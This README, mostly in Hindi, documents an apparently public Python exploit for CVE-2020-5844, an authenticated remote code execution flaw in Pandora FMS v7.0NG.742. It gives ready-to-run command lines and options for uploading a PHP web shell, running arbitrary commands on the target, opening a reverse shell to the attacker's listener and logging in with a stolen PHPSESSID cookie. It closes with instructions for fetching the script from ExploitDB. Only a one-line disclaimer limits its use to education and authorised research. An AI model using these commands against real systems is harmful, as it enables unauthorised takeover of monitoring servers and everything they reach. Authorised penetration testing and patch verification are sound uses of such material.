
CVE-2020-5844 (Pandora FMS v7.0NG.742) के लिए एक्सप्लॉइट - रिमोट कोड निष्पादन

इस रेपो को पसंद है? हमें ⭐ दें!
केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए।
@UNICORDev द्वारा (@NicPWNs और @Dev-Yeoj)
Pandora FMS v7.0 NG में index.php?sec=godmode/extensions&sec2=extensions/files_repo प्रमाणित व्यवस्थापकों को दुर्भावनापूर्ण PHP स्क्रिप्ट अपलोड करने और फ़ाइल स्थान के base64 डिकोडिंग के माध्यम से उन्हें निष्पादित करने की अनुमति देता है। यह v7.0NG.742_FIX_PERL2020 को प्रभावित करता है।
Pandora FMS के कमजोर संस्करणों पर रिमोट कोड एक्सिक्यूशन के लिए इस एक्सप्लॉइट का उपयोग करें। इसके लिए लक्ष्य IP पता और पोर्ट की आवश्यकता होती है। मान्य उपयोगकर्ता नाम/पासवर्ड या मान्य PHPSESSID कुकी प्रमाणीकरण की आवश्यकता होती है। बेसिक PHP वेब शेल अपलोड करने के लिए डिफ़ॉल्ट मोड में चलाएँ। लक्ष्य पर कस्टम कमांड चलाने के लिए कस्टम कमांड मोड में चलाएँ। अपने द्वारा सेट किए गए लिसनर पर लक्ष्य से रिवर्स शेल प्राप्त करने के लिए रिवर्स शेल मोड में चलाएँ। PHP वेब शेल फ़ाइल का नाम बदलने के लिए वेब शेल कस्टम मोड में चलाएँ।
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -u <username> <password>
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID>
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-c <custom-command>]
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-s <local-ip> <local-port>]
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-w <name.php>]
python3 exploit-CVE-2020-5844.py -h
-t Target host and port. Provide target IP address and port.
-u Target username and password. Provide username and password to log in to Pandora FMS.
-p Target valid PHP session ID. No username or password needed. (Optional)
-s Reverse shell mode. Provide local IP address and port. (Optional)
-c Custom command mode. Provide command to execute. (Optional)
-w Web shell custom mode. Provide custom PHP file name. (Optional)
-h Show this help menu.
exploit-CVE-2020-5844.py को GitHub से डाउनलोड करें
exploit-CVE-2020-5844.py को ExploitDB से डाउनलोड करें
searchsploit -u
searchsploit -m 50961
Pandora FMS v7.0NG.742




